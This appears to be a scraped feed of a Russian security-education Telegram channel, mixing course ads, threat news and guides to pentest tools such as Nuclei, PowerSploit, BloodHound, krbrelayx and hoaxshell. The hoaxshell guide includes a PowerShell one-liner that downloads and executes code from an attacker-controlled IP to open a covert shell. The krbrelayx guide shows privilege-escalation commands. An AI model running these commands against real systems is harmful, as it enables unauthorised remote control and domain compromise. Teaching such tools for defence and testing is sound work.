34787
Крупнейшее ИБ сообщество ру-сегмента Чат: @codeby_one Форум: codeby.net Обучение: codeby.school Пентест: codeby.one CTF: codeby.games VK: vk.com/codeby YT: clck.ru/XG99c Сотрудничество: @KinWiz Номер заявления для регистрации канала в РКН: 5035340278
Как защитить IT-инфраструктуру компании от хакеров и утечек? 🔐
Под руководством опытных кураторов вы разберётесь в ключевых процессах мониторинга безопасности и научитесь внедрять их на практике
🔴Подробнее
Что ждёт на курсе?
✨ Threat Intelligence & Hunting — ищем угрозы
✨ Vulnerability & Patch Management — закрываем дыры быстрее хакеров
✨ Incident Response (IR) — отрабатываем атаки по шагам
✨ Администрирование СЗИ — настраиваем защиту как профи
Что получите в итоге?
🔸Готовые схемы защиты под разные бизнес-сценарии
🔸 Навыки, которые ценят в SOC, CERT и отделах безопасности
🔸Сертификат
Кому подойдёт?
✅ Начинающим специалистам по инфобезопасности
✅ Сисадминам, которые хотят перейти в ИБ
✅ IT-специалистам, уставшим от "латания дыр" без системы
🔴 Успейте записаться до 20 октября
🚀 По всем вопросам пишите @CodebyManagerBot
🛡 Введение в информационную безопасность - теперь на HackerLab!
Информационная безопасность - не одна профессия, а целая экосистема. Одни ищут уязвимости и тестируют системы на прочность, другие расследуют инциденты, третьи строят инфраструктуру, где риски сбоев и утечек сведены к минимуму.
Чтобы осознанно выбрать своё направление, нужно понимать,
как всё это устроено изнутри - от атак и уязвимостей до принципов защиты.
⚠️ Именно с этого начинается курс «Введение в информационную безопасность», который включён в новую подписку PRO для самостоятельного изучения.
Ты научишься:
🔵Находить и эксплуатировать уязвимости
🔵Решать CTF-задания
🔵Организовывать защиту от перебора паролей и настраивать систему обнаружения вторжений
🔵Работать с консолью Windows и Linux и писать скрипты для автоматизации задач
🔵Пользоваться ключевыми инструментами пентестера
✅ Теперь в подписке PRO:
- Курс «Введение в информационную безопасность»
- Курс «SQL Injection Master»
- Полный доступ к архивным заданиям
- Доступ к WriteUps для архивных заданий
- Изолированная инфраструктура
➡️ Прокачивайся уже сейчас: https://hackerlab.pro/subscription
Продолжаем мотивировать вас на обучение! 🧑💻
Академия Кодебай поделилась уроками для CyberCamp2025 на темы:
😎 Реагирование на компьютерные инциденты
Рассмотрим 4 этапа реагирования: подготовка, обнаружение, анализ и сдерживание. В рамках каждого этапа представлено описание процессов, технологий и возможных артефактов при проведении криминалистического анализа, а также перечень мероприятий, проводимых после инцидента.
😎 Пентест инфраструктуры Active Directory
Изучим основные элементы пентеста: уязвимые конфигурации списков доступа, получение первоначального доступа и сохранение доступа к системе. Вся практическая часть представлена в виде наглядных видео-уроков 👨💻
😎 OSINT: технология боевой разведки
Проанализируем виды идентификаторов в открытых источниках: электронная почта, никнейм, профили в социальных сетях, и даже IP-адрес 👻
©️ Регистрация l 😺 Чат
Readpe: Мастер-инспектор для PE-файлов под Linux
Readpe — это дизассемблер и анализатор PE-файлов. Его ключевое преимущество — кроссплатформенность. Многие аналогичные инструменты заточены под Windows, а readpe компилируется и работает в средах Linux, что делает его незаменимым в арсенале специалистов, которые предпочитают или вынуждены проводить анализ на Unix-подобных системах.
git clone https://github.com/mentebinaria/readpe.git
cd readpe
sudo make install
echo "/usr/local/lib" | sudo tee /etc/ld.so.conf.d/libpe.conf
sudo ldconfig
readpe --h
-H выводит сводную информацию из заголовковreadpe -H notepad.exe
Вывод покажет архитектуру (
x86/x64
), точку входа, характеристики файла, размеры секций и другую метаинформацию.
readpe -i notepad.exe
Вы увидите список всех импортированных
DLL
(например,
KERNEL32.DLL, USER32.DLL, GDI32.DLL
) и конкретных функций из них (
CreateFile, MessageBox, GetSystemTime и т.д.
). Это мгновенно дает понимание о потенциальных возможностях анализируемого файла.
-S отображает все секции файла (.text, .data, .rdata, .rsrc и др.).readpe -S notepad.exe
В выводе вы найдете имена секций, их виртуальные и физические размеры, атрибуты доступа. Это важно для оценки, например, наличия нестандартных или исполняемых секций с атрибутом на запись — частый признак уязвимости или зловредной техники.Читать полностью…
🚩 Новые задания на платформе HackerLab!
🔎 Категория OSINT — Канатная дорога
🌍 Категория Веб — Nova Arts
Приятного хакинга!
Гайд по восстановлению данных: метаданные, карвинг и работа с образами.
🪵Удалили файл и тут же об этом пожалели? Не всё потеряно. В нашей новой статье разбираем, что на самом деле происходит с данными после удаления и как их можно вернуть.
Рассказываем простыми словами о сложных вещах:
🔵Как правильно создать образ сбойного диска утилитой ddrescue
🔵Как попытаться восстановить файлы с именами и папками
🔵Что такое файловый карвинг и когда он — последняя надежда
🔵Почему для SSD и флешек эти инструкции могут не сработать.
📎Лучший способ не потерять данные — быть готовым к их восстановлению. Сохраняйте подробный гайд и действуйте на опережение!
🇨🇳 Китайские хакеры используют Zero-day в VMware!
📞 Связанные с Китаем хакеры используют новую уязвимость нулевого дня VMware с октября 2024 года. По данным NVISO Labs , недавно исправленная уязвимость безопасности, затрагивающая Broadcom VMware Tools и VMware Aria Operations, эксплуатировалась как уязвимость нулевого дня с середины октября 2024 года злоумышленником под именем UNC5174.
❗️ Злоумышленники используют уязвимость CVE-2025-41244 с оценкой CVSS: 7,8, эксплуатируя локальную ошибку повышения привилегий в функции get_version(). Затрагиваются такие продукты, как VMware Cloud Foundation, VMware vSphere Foundation, VMware Aria Operations, VMware Telco Cloud Platform и VMware Telco Cloud Infrastructure.
🔎 Исследователь NVISO Максим Тибо обнаружил уязвимость и сообщил о ней 19 мая 2025 года. Компания также заявила, что VMware Tools 12.4.9, входящий в состав VMware Tools 12.5.4, устраняет эту проблему в 32-разрядных системах Windows, а версия open-vm-tools, устраняющая CVE-2025-41244, будет распространяться поставщиками Linux.
💻 По данным NVISO, уязвимость коренится в функции под названием «get_version()», которая принимает шаблон регулярного выражения (regex) в качестве входных данных для каждого процесса с прослушивающим сокетом, проверяет, соответствует ли двоичный файл, связанный с этим процессом, шаблону, и, если соответствует, вызывает команду версии поддерживаемой службы.
💻 Как утверждает эксперт, широкая практика имитации системных двоичных файлов (например, httpd) подчеркивает реальную возможность того, что несколько других видов вредоносного ПО в течение многих лет случайно извлекали выгоду из непреднамеренного повышения привилегий
❗️ Так что, если используете в своих инфраструктурах продукты VMware, то будьте внимательны!
Обход защиты с помощью hoaxshell: HTTP-канал для скрытного управления Windows
Специалисты по кибербезопасности традиционно разделяют инструменты для тестирования на проникновение на два типа: мощные, но сложные, или простые, но ограниченные. Hoaxshell — инструмент, который ломает стереотип. Скрипт использует нестандартный подход к работе с PowerShell, превращая его в эффективное средство для моделирования угроз и оценки защищённости инфраструктуры.
git clone https://github.com/t3l3machus/hoaxshell
cd ./hoaxshell
sudo pip3 install -r requirements.txt
chmod +x hoaxshell.py
hoaxshell -h
sudo python3 hoaxshell.py -s 8080
PS C:\> $s='http://ВАШ_IP:8080'; $i='UNIQUE_SESSION_ID'; $p='http://proxy-server.com:8080'; iex (New-Object Net.WebClient).DownloadString("$s/index.html")
sudo python3 hoaxshell.py -s 443 -t ssl
В этом случае команда для цели будет использовать
https://. Если целевая машина использует корпоративный прокси, в команду можно добавить соответствующие параметры.
🛠 Мощь и беспомощность пакера UPX
В новой статье мы подробно разбираем UPX - один из самых популярных упаковщиков исполняемых файлов. Это подробный гайд для тех, кто хочет понять, как работает UPX, и научиться распаковывать файлы вручную.
Внутри вас ждет:
🔵Принцип работы UPX. Как упаковщик перестраивает PE-файл и какие изменения вносит в его структуру.
🔵UPX-заголовок. Объяснение структуры заголовка и почему его повреждение делает автоматическую распаковку невозможной.
🔵Ручная распаковка. Пошаговая инструкция по восстановлению Original Entry-Point (OEP) и Import Address Table (IAT) для корректного запуска файла.
📌 Читать статью
#upx #reverse #infosec
🤖 ИИ внедряется в работу SOC
📊 Исходя из недавнего исследования Prophet Security, традиционная модель работы SOC уже не выдерживает наплыва работы, накапливая большие объемы оповещения, замедляя расследования и увеличивая стоимость перегруженных команд SOC-аналитиков.
🗣 Опрос проходил среди 282 руководителей служб безопасности компаний из разных отраслей, раскрывая суровую реальность, с которой сталкиваются современные центры безопасности, которые уже не могут скрывать такие серьезные проблемы, как пропуск критических угроз.
📈 В связи с чем компании стали активно внедрять ИИ в работу своих SOC команд. Таким образом ИИ переходит от эксперимента к стратегическому приоритету.
🤖 В настоящее время 55% служб безопасности уже используют ИИ, как ассистента в рабочих процессах для поддержки сортировки оповещений и проведения расследований.
📈 Следующая волна внедрения стремительно приближается. Среди команд, ещё не использующих ИИ, 60% планируют оценить решения SOC на базе ИИ в течение года. Согласно опросу, ожидается, что в ближайшие три года 60% всех рабочих нагрузок SOC будут обрабатываться с помощью ИИ.
⌛️ В качестве метрик успешности внедрения ИИ организации планируют оценивать прогресс по сокращению среднего времени расследования (MTTI) и среднего времени реагирования (MTTR), а также по традиционным показателям закрытия оповещений.
Устроиться специалистом по информационной безопасности в Яндекс за несколько дней
Для этого есть отличная возможность: мы приглашаем специалистов с опытом от 2 лет на Week Offer Security 11–17 октября. Всего за неделю вы сможете пройти все собеседования и получить офер в Яндекс.
Как это устроено:
🔸 Регистрируйтесь и отправляйте заявку до 8 октября
🔸 Пройдите две технические секции 11–12 октября
🔸 Познакомьтесь с командами и получите офер 13–17 октября
Для регистрации переходите по ссылке. Удачи!
Nuclei: Автоматизация безопасности через шаблоны
Nuclei — инструмент командной строки с открытым исходным кодом для масштабируемого сканирования безопасности на основе шаблонов. Принцип работы основан на использовании централизованной базы шаблонов (формат YAML). Каждый шаблон содержит инструкции для проверки одной конкретной уязвимости, небезопасной конфигурации или технологии.
go install -v github.com/projectdiscovery/nuclei/v3/cmd/nuclei@latest
nuclei -update-templates
nuclei -h
nuclei -u example.com -severity critical,high
nuclei -list targets.txt -o results.json -json
nuclei -u https://example.com -t /path/to/nuclei-templates/cves/2021/CVE-2021-44228.yaml
[CVE-2021-44228] @ https://example.com/api/login
[info] The target is vulnerable to Log4Shell (CVE-2021-44228).
[template] cves/2021/CVE-2021-44228.yaml
[severity] critical
echo "domain.com" | subfinder | httpx | nuclei -silent
nuclei -list targets.txt -rate-limit 50 -concurrency 10
nuclei -u example.com -rate-limit 10 -timeout 20
🚩 Новые задания на платформе HackerLab!
👩💻 Категория Pentest Machines — Аромат
——————————————
🗂 В архив добавлены задания с прошлых соревнований + райтапы:
🟠Веб - Микробаг
🟠Реверс-инжиниринг - Три Лика Тени
Приятного хакинга!
Скучали по неформальным встречам? Тогда вам на Security DrinkUp 15 октября от Авито! ☄️
Некоторые из тем, которые будут там обсуждать в неформальной обстановке:
➡️ WAF или POH? Стоит ли WAF своих денег;
➡️ Нужны ли «апруверы» в заказе доступов;
➡️ DLP: фикция или реальное средство защиты данных организации;
➡️ AI в безопасности и безопасность в AI.
Будет ли что-то кроме дискуссий?
Конечно! Можно будет сыграть в кастомную настолку «Киберлабиринт» и максимально продуктивно понетворкать.
Так что если давно искали, как познакомиться поближе с комьюнити — велком по ссылке на регистрацию!
☎️ Хакеры обманом заставляют загружать вредоносную версию Microsoft Team
👩💻 Атакующие пользуются доверием пользователей к популярному программному обеспечению, обманным путем заставляя их загружать модифицированную версию Microsoft Team для получения удаленного доступа.
🔍 Злоумышленники используются поисковой оптимизации (SEO) и вредоносную рекламу, чтобы заманить ничего не подозревающих жертв на мошеннические страницы загрузки.
🎩 Компания Blackpoint выявила новую волну атак, при которой пользователи, ищущие «скачать Microsoft Teams», видят вредоносную рекламу, перенаправляющую их на поддельные веб-сайты. Пользователи переходили на "teams-install[.]top", в котором располагался вредоносный файл "MSTeamsSetup.exe"
✍️ Чтобы выглядеть как настоящие, эти поддельные установщики часто подписываются ненадёжными цифровыми сертификатами от таких эмитентов, как «4th State Oy» и «NRM NETWORK RISK MANAGEMENT INC.». Этот приём помогает обойти базовые проверки безопасности, которые выявляют неподписанное ПО.
📌 ВПО помещала в папку %APPDATA%\\Roaming зараженный DDL с именем CaptureService.dll и тем самым обеспечивала закрепление в инфраструктуре жертвы.
🔐 Данный комплекс вредоносной активности назвали бэкдор Oyster, который обеспечивал удаленный доступ и взаимодействие с C2-сервером. В ходе анализа были выявлены такие индикаторы компрометации, как nickbush24[.]com и techwisenetwork[.]com.
⚠️ Будьте внимательны и проверяйте, какие ресурсы посещаете.
PowerSploit — Модульный PowerShell-фреймворк для пост-эксплуатации
PowerSploit — это коллекция PowerShell-модулей и скриптов, предназначенных для помощи пентестерам и red-team специалистам на этапах пост-эксплуатации: выполнение кода, повышение привилегий, обход защиты, сбор информации и вывод данных. Проект содержит набор готовых функций для инъекции кода, извлечения учётных данных, поиска в системе уязвимостей конфигурации и других задач, характерных для работы после получения начального доступа.
git clone https://github.com/PowerShellMafia/PowerSploit.git
cd PowerSploit
# импорт конкретного скрипта, например PowerUp
Import-Module .\Privesc\PowerUp.ps1
# или выполнить функцию прямо из файла
.\Privesc\PowerUp.ps1
Invoke-AllChecks
BloodHound — Визуализация и анализ путей эскалации в Active Directory
BloodHound Legacy — оригинальная реализация известного проекта BloodHound для картирования связей в Active Directory. Инструмент собирает данные об объектах AD (пользователи, группы, компьютеры, ACL, делегирование и т.д.), загружает их в графовую базу Neo4j и отображает в удобном графическом интерфейсе, позволяющем быстро находить пути эскалации.
wget https://github.com/SpecterOps/bloodhound-cli/releases/latest/download/bloodhound-cli-linux-amd64.tar.gz
tar -xvzf bloodhound-cli-linux-amd64.tar.gz
./bloodhound-cli install
А вы знали что...
🔸85% мобильных приложений содержат критические уязвимости (отчет OWASP 2024)
🔸Каждое 3-е приложение в Google Play имеет уязвимости, связанные с хранением данных (исследование Positive Technologies).
🔸Хакерские атаки на Android выросли на 50% за последние 2 года (данные Kaspersky Lab).
Знание этих рисков – первый шаг к безопасности. Второй – освоить инструменты, которые помогут их устранить. Стартуем 20 октября! 👩💻
🔴Записаться
Рассмотрим устройство приложений под ОС Android, этапы создания мобильного приложения, приемы реверса и изменения кода. Подробно изучим поиск и эксплуатацию уязвимостей.
Курс создан для:
🌟 Сотрудников подразделений ИБ для повышения квалификации, новичков в сфере анализа мобильных приложений, реверс-инженеров для повышения квалификации в области мобильных приложений
🚀 По всем вопросам пишите @CodebyManagerBot
Разбор уязвимостей на доске!
Твоя задача — вычислить CVSS, как настоящий аналитик.
Пиши свой расчёт и аргументы в комментариях — будем считать вместе 🧮
📚 Работа и учёба отлично совмещаются на оплачиваемой стажировке GPB.Level Up: Кибербезопасность! Здесь гибкий график от 30 часов в неделю и удобные форматы: очно или гибридно в зависимости от направления.
GPB.Level Up: Кибербезопасность — стажировка в области информационной безопасности в Газпромбанке для старшекурсников, выпускников и начинающих специалистов. Вот и другие преимущества:
— зарплата 80 000 рублей со старта (gross при работе 40 часов в неделю)
— поддержка от опытных наставников и экспертов информационной безопасности
— доступ к 800+ курсам для развития soft и hard skills, Skillbox, Lerna и другим платформам
— перспективы для карьеры: более 90% участников GPB.Level Up: Кибербезопасность прошлого сезона остались работать в банке
Время показать свои таланты, жми на кнопку!
https://vk.cc/cQ15t4?erid=2W5zFJ4r7Ct
krbrelayx — Набор инструментов для атак на Kerberos и NTLM в Active Directory
krbrelayx — это мощный набор Python-утилит для тестирования безопасности инфраструктуры Active Directory, в частности Kerberos и NTLM-аутентификации. Инструмент позволяет исследовать и эксплуатировать уязвимости, связанные с relay-атаками (Kerberos relay, LDAP relay).
git clone https://github.com/dirkjanm/krbrelayx.git
cd krbrelayx
pip install -r requirements.txt
python3 krbrelayx.py --target ldap://dc01.corp.local --escalate-user attacker
python3 krbrelayx.py -t ldap://dc.corp.local --delegate-from victim$ --delegate-to target$ --add-computer attacker$
Киберпреступления оставляют цифровые следы. Научитесь их находить.
Цифровой криминалист — это тот, кто расследует атаки, восстанавливает данные и делает виртуальный мир безопаснее.
Освойте цифровую криминалистику и реагирование на инциденты в Linux-среде. Старт курса 13 октября!
⌨️ Регистрация здесь
Что вас ждёт на курсе:
🟧 Реальные кейсы, основанные на APT-отчетах
🟧 Полный цикл реагирования на инциденты с помощью opensource-инструментов
🟧 Поиск и анализ артефактов хакеров и вредоносного ПО
Кому подходит курс:
🟧 Аналитикам 1, 2, 3 линии SOC
🟧 Начинающим специалистам в DFIR и Red Team
🟧 Организациям, желающим прокачать команду по реагированию на киберинциденты и Linux-форензику
Хотите научиться расследовать кибератаки и распутывать цифровые следы?
Присоединяйтесь — узнайте всё о форензике. Начать учиться сейчас
🚀 @CodebyManagerBot
📱 Банковский Android-троян атакует пожилых людей!
👨🦳 Новый Android-троян «Datzbro» обманывает пожилых людей, используя сгенерированные искусственным интеллектом события путешествий в Facebook. Исследователи выявили ранее не выявленный банковский троян для Android под названием Datzbro , который может осуществлять атаки по захвату устройств ( DTO ) и совершать мошеннические транзакции, наживаясь на пожилых людях.
🌐 Компания ThreatFabric заявила, что обнаружила эту вредоносную активность в августе 2025 года после того, как пользователи в Австралии сообщили о мошенниках, управляющих группами в Facebook, рекламирующими «активные поездки для пожилых людей». Среди других территорий, на которые нацелились злоумышленники, — Сингапур, Малайзия, Канада, ЮАР и Великобритания.
📱 Действовали злоумышленники следующим образом: создавали тематические сообщества в Facebook, в которых генерировался контент с помощью ИИ, далее пожилые люди, которые ищут возможности для общения и путешествия, обращались к ним за услугами. После чего с ними связываются через Facebook или WhatsApp, где их просят загрузить APK-файл по вредоносной ссылке (например, «download.seniorgroupapps[.]com»), утверждая, что это позволит им зарегистрироваться на мероприятии, общаться с участниками и отслеживать запланированные мероприятия.
📵 Ниже приведен список вредоносных приложений Android, которые были обнаружены в процессе распространения Datzbro:
Senior Group (twzlibwr.rlrkvsdw.bcfwgozi)
Живые годы (orgLivelyYears.browses646)
ActiveSenior (com.forest481.security)
DanceWave (inedpnok.kfxuvnie.mggfqzhl)
作业帮 (io.mobile.Itool)
麻豆传媒 (fsxhibqhbh.hlyzqkd.aois
麻豆传媒 (mobi.audio.aassistant)
谷歌浏览器 (tvmhnrvsp.zltixkpp.mdok)
MT管理器 (varuhphk.vadneozj.tltldo)
MT管理器 (spvojpr.bkkhxobj.twfwf)
大麦 (mnamrdrefa.edldylo.zish)
MT管理器 (io.red.studio.tracker)
➡️ Что такое STIX и TAXII?
❓ Данные термины в киберразведке используются часто вместе, но что это такое и зачем они нужны?
🔺 STIX (Structured Threat Information eXpression) — это стандартный язык для структурированного описания и обмена информацией о киберугрозах. Он предоставляет общую структуру для представления данных об индикаторах компрометации, тактиках, техниках и процедурах угроз, а также участников угроз. Это позволяет организациям более эффективно обмениваться и анализировать разведывательную информацию для улучшения защиты и реагирования на инциденты
🔺 TAXII (Trusted Automated eXchange of Intelligence Information) — это протокол и набор сервисов, который обеспечивает стандартизованный и автоматизированный обмен информацией, представленной в формате STIX, между организациями. TAXII использует HTTPS и RESTful API для передачи данных, обеспечивает обнаружение, управление коллекциями данных и поддерживает различные модели обмена. Это позволяет организациям надежно и эффективно обмениваться актуальной информацией об угрозах в автоматическом режиме.
👀 Получается, что STIX отвечает за структуру и формат описания угроз, а TAXII - за способ передачи информации об угрозах. Именно поэтому они используются совместно для улучшения обмена информации об угрозах. Но как это все выглядит на практике?
Пример STIX:
{
"type": "bundle",
"id": "bundle--12345678-1234-1234-1234-123456789abc",
"objects": [
{
"type": "indicator",
"id": "indicator--abcd1234-5678-90ef-ghij-klmnopqrstuv",
"created": "2025-09-30T12:00:00Z",
"modified": "2025-09-30T12:00:00Z",
"name": "Malicious IP Address",
"description": "Known IP address associated with malware command and control",
"pattern": "[ipv4-addr:value = '192.0.2.1']",
"pattern_type": "stix",
"valid_from": "2025-09-01T00:00:00Z"
}
]
}
RDWAtool: Аудит и анализ контроллеров домена Active Directory
RDWAtool (Remote Directory Writable Attributes Tool) — утилита, разработанная французским исследователем безопасности p0dalirius. Задача — автоматизировать процесс аудита прав доступа к атрибутам объектов в Active Directory.
git clone https://github.com/p0dalirius/RDWAtool.git
cd RDWAtool
pip3 install -r requirements.txt
RDWAtool -h
python3 rdwatool.py -u 'DOMAIN\Username' -p 'Password' -d 'dc.domain.local'
После выполнения команды
RDWAtool
начнет сканирование, выводя в реальном времени список объектов
AD
и записываемых для них атрибутов.
python3 rdwatool.py -u 'DOMAIN\User' -p 'Pass' -d 'dc.domain.local' --users
python3 rdwatool.py -u 'DOMAIN\User' -p 'Pass' -d 'dc.domain.local' --computers
📱 Компания Discord опубликовала заявление с подробным разъяснением инцидента безопасности, который произошел с одним из ее сторонних поставщиков услуг по обслуживанию клиентов. В отличие от взлома систем самого Discord, инцидент стал результатом целенаправленной атаки на сотрудника третьей стороны.
🔺Хронология инцидента
Инцидент берет начало не с технического взлома, а с многоэтапной атаки методом социальной инженерии. Злоумышленники, используя методы манипуляции, смогли обманом получить доступ к учетной записи одного из сотрудников сторонней службы поддержки. Это произошло до 5 мая 2023 года, когда команде безопасности Discord официально стало известно о произошедшем.
После компрометации учетной записи злоумышленник получил доступ к тем данным, которые обрабатываются в тикетах службы поддержки. Это означает, что был раскрыт ограниченный объем информации, включающий адреса электронной почты пользователей, обращавшихся в поддержку, содержание их сообщений к операторам, а также любые документы, прикрепленные к этим обращениям.
🔺Важно подчеркнуть, что внутренние системы Discord и основные данные аккаунтов не были затронуты. Расследование не выявило никаких признаков того, что злоумышленник получил доступ к паролям, платежной информации или к личным сообщениям, которыми пользователи обмениваются в дружеских беседах и на серверах.
В своем заявлении компания принесла извинения за произошедшее и заверила, что продолжает укреплять как собственные системы безопасности, так и требования к сторонним партнерам, чтобы не допустить подобных инцидентов в будущем.
🟧 Что общего у киберпреступника и ethical-хакера? Оба идут к цели по одному и тому же пути, состоящему из пяти ключевых этапов. Давайте разберем этот путь от первого шага до последнего!
Читать полностью…
Исследователь из команды Google Project Zero детально описал новый метод удаленной утечки адресов памяти в операционных системах macOS и iOS. Этот подход позволяет обойти ключевую технологию безопасности — рандомизацию макета адресного пространства (ASLR), — не используя традиционные уязвимости повреждения памяти или атаки по боковым каналам, основанные на времени.
🟧 История открытия
Исследование было инициировано в 2024 году в рамках внутренней дискуссии в Project Zero о поиске новых способов удаленного обхода ASLR на устройствах Apple. Хотя в ходе работы не была выявлена конкретная уязвимая система или приложение в реальном мире, исследователь создал работающий прототип (proof-of-concept) на основе искусственного тестового случая с использованием фреймворка сериализации NSKeyedArchiver в macOS.
Полученные выводы были ответственно раскрыты компании Apple, которая изучила проблему и устранила ее в своих обновлениях безопасности, выпущенных 31 марта 2025 года.
Цель атаки
— утечка адреса памяти системного синглтона (уникального объекта)
NSNull
. Адрес этого объекта используется в качестве его хэш-значения. Утечка этого хэш-значения эквивалентна утечке самого адреса объекта, что подрывает защиту
ASLR
для общей области памяти (кэша), в которой он находится.
Комбинируя эти результаты, можно вычислить точное местоположение синглтона
NSNull
в памяти, что эффективно обходит защиту
ASLR
для этой области.
В отличие от классических атак по боковым каналам, которые измеряют разницу во времени выполнения операций, этот метод опирается исключительно на детерминированный (предсказуемый) результат процесса сериализации.
🟧 Готовы проверить свою кибер-интуицию? Перед вами — зашифрованные термины, с которыми ежедневно сталкиваются специалисты по безопасности. Уловите суть и делитесь версиями в комментариях! 🟧
Читать полностью…
🟧Сдвиг безопасности влево (Shift Security Left)
Практика предполагает интеграцию инструментов безопасности на начальных этапах разработки. Статический анализ безопасности приложений (SAST) выявляет уязвимости (например, SQL-инъекции) непосредственно в исходном коде, а анализ компонентов ПО (SCA) проверяет сторонние библиотеки на известные уязвимости до сборки артефакта.
Это позволяет устранять дефекты при их возникновении, снижая стоимость исправления по сравнению с обнаружением уязвимостей в готовом продукте.
Например, пайплайн может быть автоматически остановлен при обнаружении ключа доступа в коде, что исключает человеческий фактор и ускоряет обратную связь.
Это позволяет командам оптимально распределять усилия по устранению недостатков.
Например, интеграция с системами типа
HashiCorp Vault
позволяет не только выявить случайно закоммиченный токен
API
, но и немедленно аннулировать его, сводя к минимуму окно возможной компрометации до развертывания кода в продуктивной среде.
Исправление ошибок на этапе кода предотвращает создание уязвимых сред и обеспечивает соответствие стандартам комплаенс.
Когда разработчик сразу видит результаты проверки
SAST
, это ускоряет внедрение лучших практик безопасности.
Интеграция с системами управления задачами (
Jira
) автоматизирует создание тикетов на исправление, обеспечивая прозрачность процесса управления рисками.
Отслеживание дрейфа конфигураций обеспечивает соответствие пайплайнов политикам безопасности на протяжении всего жизненного цикла.Читать полностью…